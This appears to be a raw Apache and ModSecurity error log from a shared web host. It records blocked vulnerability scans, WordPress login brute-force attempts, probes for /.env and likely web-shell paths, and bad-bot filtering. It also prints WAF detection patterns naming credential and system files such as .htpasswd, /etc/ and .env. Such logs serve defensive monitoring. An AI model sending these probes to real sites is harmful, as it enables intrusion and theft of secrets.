[Tue May 26 14:57:28.128085 2026] [security2:error] [pid 658374:tid 658562] [client 77.68.9.24:49375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.samayikprasanga.in"] [uri "/images/images/cache.php"] [unique_id "ahVngJ1Mb7_aby-E0Kc9yQAAADo"], referer: www.google.com
[Tue May 26 14:57:28.135266 2026] [security2:error] [pid 662057:tid 662206] [client 71.234.38.252:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnf_T3lMm9tGFVg9RU-AAAAR0"]
[Tue May 26 14:57:30.713736 2026] [security2:error] [pid 658374:tid 658579] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVngp1Mb7_aby-E0Kc96wAAAEs"]
[Tue May 26 14:57:31.931982 2026] [security2:error] [pid 658374:tid 658623] [client 124.117.192.31:32965] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "valodico.com"] [uri "/"] [unique_id "ahVng51Mb7_aby-E0Kc-CwAAAHc"]
[Tue May 26 14:57:33.168964 2026] [security2:error] [pid 662057:tid 662242] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnhPT3lMm9tGFVg9RVLgAAAUE"]
[Tue May 26 14:57:35.309407 2026] [security2:error] [pid 658374:tid 658540] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnhp1Mb7_aby-E0Kc-UwAAACQ"]
[Tue May 26 14:57:37.466920 2026] [security2:error] [pid 658374:tid 658545] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVniZ1Mb7_aby-E0Kc-hwAAACk"]
[Tue May 26 14:57:38.847944 2026] [security2:error] [pid 662057:tid 662254] [client 77.68.9.24:54857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.samayikprasanga.in"] [uri "/images/images/cache.php"] [unique_id "ahVnivT3lMm9tGFVg9RVTgAAAU0"], referer: www.google.com
[Tue May 26 14:57:39.158614 2026] [security2:error] [pid 658374:tid 658550] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnip1Mb7_aby-E0Kc-qgAAAC4"]
[Tue May 26 14:57:39.818726 2026] [security2:error] [pid 658374:tid 658612] [client 34.195.212.30:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVni51Mb7_aby-E0Kc-vwAAAGw"]
[Tue May 26 14:57:39.819206 2026] [security2:error] [pid 658374:tid 658553] [client 34.195.212.30:50240] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVni51Mb7_aby-E0Kc-vQAAADE"]
[Tue May 26 14:57:40.019756 2026] [security2:error] [pid 662057:tid 662308] [client 34.195.212.30:10206] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahVnjPT3lMm9tGFVg9RVYgAAAYM"]
[Tue May 26 14:57:40.347909 2026] [security2:error] [pid 662057:tid 662283] [client 34.195.212.30:10210] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVnjPT3lMm9tGFVg9RVbAAAAWo"]
[Tue May 26 14:57:42.184519 2026] [security2:error] [pid 658374:tid 658588] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnjZ1Mb7_aby-E0Kc-1wAAAFQ"]
[Tue May 26 14:57:43.146523 2026] [security2:error] [pid 658374:tid 658598] [client 114.119.136.100:42789] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "toronto121mortgage.com"] [uri "/upload/files/59258-urotrin-samara-apteki.xml"] [unique_id "ahVnj51Mb7_aby-E0Kc-6gAAAF4"], referer: http://www.zig.eco.pl/files/14635-sredstva-ot-prostatita-i-dlya-povysheniya-potencii.xml
[Tue May 26 14:57:44.303944 2026] [security2:error] [pid 662057:tid 662260] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnj_T3lMm9tGFVg9RVhwAAAVM"]
[Tue May 26 14:57:44.800137 2026] [security2:error] [pid 662057:tid 662266] [client 139.180.224.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnkPT3lMm9tGFVg9RViwAAAVk"], referer: https://www.anujtradingco.com/
[Tue May 26 14:57:46.075018 2026] [security2:error] [pid 658374:tid 658604] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnkZ1Mb7_aby-E0Kc_GAAAAGQ"]
[Tue May 26 14:57:46.367286 2026] [security2:error] [pid 658374:tid 658627] [client 139.180.224.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnkp1Mb7_aby-E0Kc_JQAAAHs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444431&moderation-hash=db854aec872b4e8b0761d9bdf145f418
[Tue May 26 14:57:47.164539 2026] [security2:error] [pid 658374:tid 658565] [client 61.246.190.186:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVnk51Mb7_aby-E0Kc_PAAAAD0"]
[Tue May 26 14:57:47.165155 2026] [security2:error] [pid 658374:tid 658620] [client 61.246.190.186:63657] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/favicon.ico"] [unique_id "ahVnk51Mb7_aby-E0Kc_OgAAAHQ"]
[Tue May 26 14:57:47.514263 2026] [security2:error] [pid 662057:tid 662308] [client 61.246.190.186:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVnk_T3lMm9tGFVg9RVoAAAAYM"]
[Tue May 26 14:57:47.514781 2026] [security2:error] [pid 658374:tid 658618] [client 61.246.190.186:63657] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/favicon.ico"] [unique_id "ahVnk51Mb7_aby-E0Kc_RQAAAHI"]
[Tue May 26 14:57:48.690393 2026] [security2:error] [pid 662057:tid 662281] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnlPT3lMm9tGFVg9RVtQAAAWg"]
[Tue May 26 14:57:48.806311 2026] [core:crit] [pid 662057:tid 662235] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:57:49.587948 2026] [security2:error] [pid 662057:tid 662313] [client 139.180.224.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnlfT3lMm9tGFVg9RV3AAAAYg"], referer: https://anujtradingco.com
[Tue May 26 14:57:51.055536 2026] [security2:error] [pid 662057:tid 662242] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnlvT3lMm9tGFVg9RV7AAAAUE"]
[Tue May 26 14:57:53.160756 2026] [security2:error] [pid 658374:tid 658604] [client 182.156.19.46:51671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.19.156.182.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "makwasi.com"] [uri "/xmlrpc.php"] [unique_id "ahVnmJ1Mb7_aby-E0Kc_pwAAAGQ"]
[Tue May 26 14:57:53.160868 2026] [security2:error] [pid 658374:tid 658604] [client 182.156.19.46:51671] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "makwasi.com"] [uri "/xmlrpc.php"] [unique_id "ahVnmJ1Mb7_aby-E0Kc_pwAAAGQ"]
[Tue May 26 14:57:53.404266 2026] [security2:error] [pid 658374:tid 658505] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnmJ1Mb7_aby-E0Kc_qQAAAAE"]
[Tue May 26 14:57:54.283952 2026] [security2:error] [pid 662057:tid 662210] [client 185.191.171.3:55430] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVnmvT3lMm9tGFVg9RWDAAAASE"]
[Tue May 26 14:57:54.284110 2026] [security2:error] [pid 662057:tid 662210] [client 185.191.171.3:55430] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVnmvT3lMm9tGFVg9RWDAAAASE"]
[Tue May 26 14:57:55.695053 2026] [security2:error] [pid 658374:tid 658612] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnm51Mb7_aby-E0Kc_ywAAAGw"]
[Tue May 26 14:57:55.969758 2026] [security2:error] [pid 658374:tid 658469] [remote 45.250.255.226:40734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVnm51Mb7_aby-E0Kc_0wAANF4"]
[Tue May 26 14:57:56.895748 2026] [security2:error] [pid 662057:tid 662229] [client 114.119.155.228:39281] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVnnPT3lMm9tGFVg9RWHwAAATQ"], referer: http://haddingtonwines.com/cart?remove_item=f8f5161cf94df05793592f5fab95138b
[Tue May 26 14:57:57.997617 2026] [security2:error] [pid 658374:tid 658549] [client 116.110.43.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnnZ1Mb7_aby-E0Kc_6QAAAC0"]
[Tue May 26 14:57:57.998431 2026] [security2:error] [pid 658374:tid 658560] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnnZ1Mb7_aby-E0Kc_6gAAADg"]
[Tue May 26 14:57:58.959085 2026] [security2:error] [pid 658374:tid 658565] [client 176.65.139.232:19292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "nigeriahomebuilders.com.taotechservices.com"] [uri "/.env"] [unique_id "ahVnnp1Mb7_aby-E0Kc__QAAAD0"]
[Tue May 26 14:58:00.146574 2026] [security2:error] [pid 658374:tid 658559] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnn51Mb7_aby-E0KdABwAAADc"]
[Tue May 26 14:58:01.350704 2026] [security2:error] [pid 658374:tid 658599] [client 176.65.139.233:43408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "nigeriahomebuilders.com"] [uri "/.env"] [unique_id "ahVnoZ1Mb7_aby-E0KdAGgAAAF8"]
[Tue May 26 14:58:01.476060 2026] [security2:error] [pid 662057:tid 662282] [client 20.104.227.76:23630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.gldmarsa.com"] [uri "/wk/index.php"] [unique_id "ahVnofT3lMm9tGFVg9RWSwAAAWk"]
[Tue May 26 14:58:01.884390 2026] [security2:error] [pid 658374:tid 658627] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnoZ1Mb7_aby-E0KdAHAAAAHs"]
[Tue May 26 14:58:04.150611 2026] [security2:error] [pid 658374:tid 658499] [remote 5.42.158.148:47684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVno51Mb7_aby-E0KdASAAAd3w"]
[Tue May 26 14:58:04.671434 2026] [security2:error] [pid 658374:tid 658591] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnpJ1Mb7_aby-E0KdASwAAAFc"]
[Tue May 26 14:58:06.649447 2026] [security2:error] [pid 662057:tid 662220] [client 154.161.32.97:47146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnpvT3lMm9tGFVg9RWcwAAASs"]
[Tue May 26 14:58:06.649664 2026] [security2:error] [pid 662057:tid 662220] [client 154.161.32.97:47146] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnpvT3lMm9tGFVg9RWcwAAASs"]
[Tue May 26 14:58:06.836083 2026] [security2:error] [pid 658374:tid 658568] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnpp1Mb7_aby-E0KdAYwAAAEA"]
[Tue May 26 14:58:09.307176 2026] [core:error] [pid 658374:tid 658605] [client 167.99.89.189:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:58:09.307197 2026] [core:error] [pid 658374:tid 658605] [client 167.99.89.189:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:58:09.431809 2026] [security2:error] [pid 662057:tid 662271] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnqfT3lMm9tGFVg9RWgAAAAV4"]
[Tue May 26 14:58:11.330076 2026] [security2:error] [pid 658374:tid 658601] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnqp1Mb7_aby-E0KdAoAAAAGE"]
[Tue May 26 14:58:12.787455 2026] [security2:error] [pid 658374:tid 658549] [client 104.210.140.131:22079] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVnq51Mb7_aby-E0KdApQAALWs"]
[Tue May 26 14:58:13.728945 2026] [security2:error] [pid 658374:tid 658550] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnrZ1Mb7_aby-E0KdAyQAAAC4"]
[Tue May 26 14:58:14.375255 2026] [security2:error] [pid 662057:tid 662253] [client 20.104.227.76:22762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.gldmarsa.com"] [uri "/inputs.php"] [unique_id "ahVnrvT3lMm9tGFVg9RWmwAAAUw"]
[Tue May 26 14:58:14.393869 2026] [security2:error] [pid 658374:tid 658617] [client 154.161.32.97:57080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnrp1Mb7_aby-E0KdA1QAAAHE"]
[Tue May 26 14:58:14.402012 2026] [security2:error] [pid 658374:tid 658617] [client 154.161.32.97:57080] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnrp1Mb7_aby-E0KdA1QAAAHE"]
[Tue May 26 14:58:15.710285 2026] [security2:error] [pid 658374:tid 658512] [client 20.104.227.76:5253] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.gldmarsa.com"] [uri "/ioxi-o.php"] [unique_id "ahVnr51Mb7_aby-E0KdA6AAAAAg"]
[Tue May 26 14:58:15.853162 2026] [security2:error] [pid 658374:tid 658553] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnr51Mb7_aby-E0KdA5AAAADE"]
[Tue May 26 14:58:18.242478 2026] [security2:error] [pid 658374:tid 658519] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnsZ1Mb7_aby-E0KdBBQAAAA8"]
[Tue May 26 14:58:18.469459 2026] [security2:error] [pid 658374:tid 658540] [client 20.104.227.76:5290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.gldmarsa.com"] [uri "/function/function.php"] [unique_id "ahVnsp1Mb7_aby-E0KdBDgAAACQ"]
[Tue May 26 14:58:19.795999 2026] [security2:error] [pid 658374:tid 658505] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVns51Mb7_aby-E0KdBGgAAAAE"]
[Tue May 26 14:58:20.306291 2026] [security2:error] [pid 658374:tid 658592] [client 45.154.98.38:62243] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVntJ1Mb7_aby-E0KdBJQAAAFg"]
[Tue May 26 14:58:20.739268 2026] [security2:error] [pid 662057:tid 662254] [client 45.154.98.38:62859] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "consultrgb.moes-art.com"] [uri "/xmlrpc.php"] [unique_id "ahVntPT3lMm9tGFVg9RWtQAAAU0"]
[Tue May 26 14:58:21.038134 2026] [security2:error] [pid 662057:tid 662245] [client 45.154.98.38:63261] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVntfT3lMm9tGFVg9RWtwAAAUQ"]
